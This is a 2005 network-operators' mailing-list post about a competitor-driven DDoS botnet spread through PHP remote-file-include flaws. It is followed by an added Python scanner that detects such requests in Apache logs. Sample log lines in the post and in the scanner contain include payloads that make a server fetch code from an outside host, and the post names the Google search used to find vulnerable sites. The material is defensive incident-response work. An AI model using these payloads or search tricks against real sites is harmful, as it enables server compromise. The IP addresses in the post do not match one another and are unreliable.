Re: Destructive botnet originating from Japan
- From: Barrett G. Lyon
- Date: Sat Dec 24 13:45:38 2005
Here is a little update:
As of last night authorities were able to seize the IRC server from
the ISP in Japan and there will be extensive follow-up on it. The DDoS
attack is now running headless in the happy range of about 3+ Gbps at
around 7-9M PPS. The bots will continue attacking us until they
receive the stop command from the bot master; there will never be a
stop command, so we will continue to see packet love for a few months
while people find that they are attacking us. We will publish a new
list of the bots on Monday as we idle with this low traffic rate over
The attacker was targeting a couple of customers that came into our
environment after other solutions failed to work for them. After
reviewing and comparing notes, it is obvious that the attacks were
assassination attempts from a competitor. There was no extortion
If you want to get the bots off your network, watch flow data
destined to AS32787 with SYN floods to TCP 80 as the destination.
Sites that use a PHP include (without validating the strings) to pull
up different web sections and pages are at risk; a lot of people are
reporting infection via "$section.php" and "$page.php", the attacker
appears to have used Google to locate sites that use includes in that
fashion (searching "index.php?page=" or "index.php?section=").
Reviewing infected machines for logs related to 220.127.116.11 would be
an easy way to locate a past infection but may not be reliable if the
attacker starts a new botnet. An example of the log data looks
something like this:
grep 18.104.22.168 access_log
22.214.171.124 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//126.96.36.199/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
Happy hunting and have nice holidays!
CTO and founder
Prolexic Technologies, Inc
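The grep in the post above finds one known payload host. The following is an added example (not part of the post, and not Prolexic's code) that generalises that check: it parses Apache combined-format access log lines, percent-decodes each query parameter, and flags any request whose parameter value is an absolute URL, which is the signature of the "$section.php" / "$page.php" remote-include abuse the post describes. It also accepts an optional list of already-known payload hosts, matching the post's grep. The log lines, IP addresses (RFC 5737 documentation ranges) and host 198.51.100.7 are constructed for the example.

```python
"""Flag remote-file-include (RFI) attempts in Apache access logs.

Added example, not part of the NANOG post. Sample log lines and IP
addresses below are constructed (RFC 5737 documentation ranges).
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: ip ident user [ts] "req" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Absolute-URL schemes that an unvalidated PHP include() will try to fetch
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_rfi_params(target):
    """Return (param, decoded_value) pairs whose value is an absolute URL.

    parse_qsl already percent-decodes, so 'http%3A//' becomes 'http://'.
    The value is kept exactly as sent (including any trailing '?') so the
    analyst sees the original payload.
    """
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_SCHEME.match(v)]


def scan(lines, known_hosts=()):
    """Scan log lines; return one finding per suspicious request.

    known_hosts: hosts/IPs already identified as payload sources
    (the post's grep is the single-host version of this check).
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip, do not crash the sweep
        reasons = []
        hits = find_rfi_params(rec['target'])
        if hits:
            reasons.append('rfi-param:' + ','.join(k for k, _ in hits))
        if any(h in rec['target'] for h in known_hosts):
            reasons.append('known-payload-host')
        if reasons:
            findings.append({
                'src': rec['ip'], 'ts': rec['ts'], 'status': rec['status'],
                'ua': rec['ua'], 'params': hits, 'reasons': reasons,
            })
    return findings


# Constructed sample lines; 198.51.100.7 stands in for a payload host.
SAMPLE_LINES = [
    '192.0.2.10 - - [23/Dec/2005:11:40:02 +0000] "GET /index.php?section=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//198.51.100.7/cmd.txt? HTTP/1.0" 200 8010 "-" "Wget/1.6"',
    '203.0.113.5 - - [23/Dec/2005:11:45:39 +0000] "GET /index.php?page=https://198.51.100.7/cmd.txt? HTTP/1.0" 200 8010 "-" "Wget/1.6"',
    '192.0.2.11 - - [23/Dec/2005:11:46:00 +0000] "GET /images/logo.gif HTTP/1.1" 304 - "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LINES, known_hosts=('198.51.100.7',)):
        print(f['ts'], f['src'], f['reasons'], f['params'])
```

Run it against a real access_log with `scan(open('access_log'))`; a 200 status on a flagged request is the case worth escalating, since it means the include was served rather than rejected.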